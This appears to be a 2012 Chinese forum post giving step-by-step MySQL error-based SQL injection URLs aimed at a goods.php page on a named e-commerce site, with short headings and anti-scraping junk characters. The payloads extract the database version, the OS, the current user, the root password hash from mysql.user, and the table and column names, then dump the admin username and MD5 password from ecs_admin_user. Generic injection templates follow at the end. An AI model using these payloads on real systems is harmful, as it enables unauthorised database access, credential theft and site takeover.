标题: 盲注详细内容 [打印本页] 作者: admin 时间: 2012-9-5 14:59 标题: 盲注详细内容 判断版本号 # B/ _ R# r& M! G# G# _9 [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ! s- Z) h ^# B; v4 M 9 Y+ Q0 s9 i. T9 r判断系统 " V0 K3 W" e5 E5 }, m6 W, H) P0 @* L/ a' G8 F; C: l http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ; }0 a: U' k6 c9 V 1 [& l9 Q3 d. L2 @; b* \ + n, J% v7 p) C) S3 \5 P$ b" \8 q h3 j6 ]) Y, ?( \: X
当前 user()% F2 W( ?0 {% C/ N1 X- W* ]3 `% f
+ o" ?! P0 j; Q5 L3 thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 _9 D( E: j- G j+ K5 G' s
% v- v8 j, L K( J% j) b0 F 5 a* Y* l# B+ X$ S+ i6 j" _4 G* i, G: A& W) W' s9 c/ `
当前 database()) q; c4 `7 Y% w! B http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 2 E# L+ ~$ s. y+ \* _) a) [* f3 M+ b9 V% j6 d. a) \! p+ I$ u
2 c( T5 F' }4 J( e" ] * F: h1 u+ `3 I + K) s$ Y3 }4 l' C% @8 iroot hash 1 z( m% d6 f9 L8 \& U c; ~$ V & s( _; j) _5 \9 G3 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 * V" O3 l/ T$ @ ; L' g4 I! R$ H! d; {; H. S1 F! Y6 o7 J( ~
1 ^& P9 |- l8 `3 J! Q1 I0 t当前 数据库表名; ^5 r1 [% _# r* u& V- z
" j- W( T% W, q) t4 u0 x, B$ X+ x http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ J3 @9 \9 B$ p; C. J6 @5 }* D g
9 ?. ~0 w* m3 R1 K; k7 N# c
# Z" m5 u6 X7 m$ K7 o" i3 \. u 9 R/ C$ B* }: I6 B) }当前 数据库 user_name 字段( j+ |1 K7 F" f; V J
/ ^1 g5 G2 i0 U, u1 X) ? http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 8 d- O7 A- L: V' c9 U8 l2 M8 d! @8 n/ H* c( u# `8 t
当前 数据库 字段 password 2 ~) K) |" T% [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' a' L [3 y/ Z: v& I8 w* E; m
8 @, `% c( A' j% _
% j* I! r/ o- S/ j* `* p! J9 K
9 n& z5 C3 d- b# K
获得 admin passwd(md5)0 `1 x2 e( @" w; \$ v; i" B
I/ e+ E1 s( E* h6 O" D4 a6 t y6 V t9 e0 l* { http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 9 s8 c4 J: |: `5 W' y' S$ I, i: Q7 H8 ]
报错注射. v" ]/ p5 R% R7 z# J5 y
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) ; W/ z( m* {9 k/ M1 G m4 M0 f1 @" ^
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) 3 ~ r% e+ g5 v5 u! |, z- x- a( |( T / I" n. W9 w1 {" f1 r3 A- N" pand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)